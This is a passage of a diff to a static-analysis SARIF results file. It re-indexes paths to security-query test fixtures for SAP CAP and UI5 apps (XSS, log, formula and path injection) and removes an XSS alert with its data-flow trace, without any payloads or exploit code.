"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 329 + "index" : 24 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 330 + "index" : 25 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 331 + "index" : 26 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 332 + "index" : 27 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 333 + "index" : 28 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 334 + "index" : 29 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 335 + "index" : 30 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 336 + "index" : 31 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 337 + "index" : 32 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 338 + "index" : 33 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 339 + "index" : 34 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 340 + "index" : 35 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 341 + "index" : 36 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 342 + "index" : 37 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 343 + "index" : 38 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 344 + "index" : 39 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 345 + "index" : 40 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 346 + "index" : 41 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 347 + "index" : 42 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 348 + "index" : 43 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 349 + "index" : 44 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 350 + "index" : 45 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 351 + "index" : 46 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 352 + "index" : 47 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 353 + "index" : 48 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 354 + "index" : 49 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 355 + "index" : 50 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", "uriBaseId" : "%SRCROOT%", - "index" : 356 + "index" : 51 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 357 + "index" : 52 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 358 + "index" : 53 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", "uriBaseId" : "%SRCROOT%", - "index" : 359 + "index" : 54 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", "uriBaseId" : "%SRCROOT%", - "index" : 360 + "index" : 55 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", "uriBaseId" : "%SRCROOT%", - "index" : 361 + "index" : 56 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 362 + "index" : 57 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 363 + "index" : 58 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", "uriBaseId" : "%SRCROOT%", - "index" : 364 + "index" : 59 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", "uriBaseId" : "%SRCROOT%", - "index" : 365 + "index" : 60 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 366 + "index" : 61 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 367 + "index" : 62 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 368 + "index" : 63 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 369 + "index" : 64 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 370 + "index" : 65 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 371 + "index" : 66 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 372 + "index" : 67 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 373 + "index" : 68 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 374 + "index" : 69 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 375 + "index" : 70 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 376 + "index" : 71 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 377 + "index" : 72 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 378 + "index" : 73 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 379 + "index" : 74 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 380 + "index" : 75 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 381 + "index" : 76 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 382 + "index" : 77 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 383 + "index" : 78 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 384 + "index" : 79 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 385 + "index" : 80 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 386 + "index" : 81 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 387 + "index" : 82 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 388 + "index" : 83 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 389 + "index" : 84 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 390 + "index" : 85 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 391 + "index" : 86 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 392 + "index" : 87 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 393 + "index" : 88 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 394 + "index" : 89 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 395 + "index" : 90 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 396 + "index" : 91 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 397 + "index" : 92 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 398 + "index" : 93 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 399 + "index" : 94 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 400 + "index" : 95 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 401 + "index" : 96 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 402 + "index" : 97 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 403 + "index" : 98 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 404 + "index" : 99 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 405 + "index" : 100 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 406 + "index" : 101 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 407 + "index" : 102 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 408 + "index" : 103 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 409 + "index" : 104 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", "uriBaseId" : "%SRCROOT%", - "index" : 410 + "index" : 105 } }, { "location" : { - "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 106 } }, { "location" : { - "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 412 + "index" : 107 } }, { "location" : { - "uri" : "qlt.conf.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 413 + "index" : 108 } }, { "location" : { - "uri" : "scripts/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", "uriBaseId" : "%SRCROOT%", - "index" : 414 + "index" : 109 } }, { "location" : { - "uri" : "scripts/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 415 + "index" : 110 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 416 + "index" : 111 } - } ], - "results" : [ { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 4, - "startColumn" : 20, - "endColumn" : 25 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "6311a9ed7e4091a4:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 4, - "startColumn" : 20, - "endColumn" : 25 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 4, - "startColumn" : 20, - "endColumn" : 25 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 11, - "startColumn" : 20, - "endColumn" : 25 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "8e517fc6fdf32a1a:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" 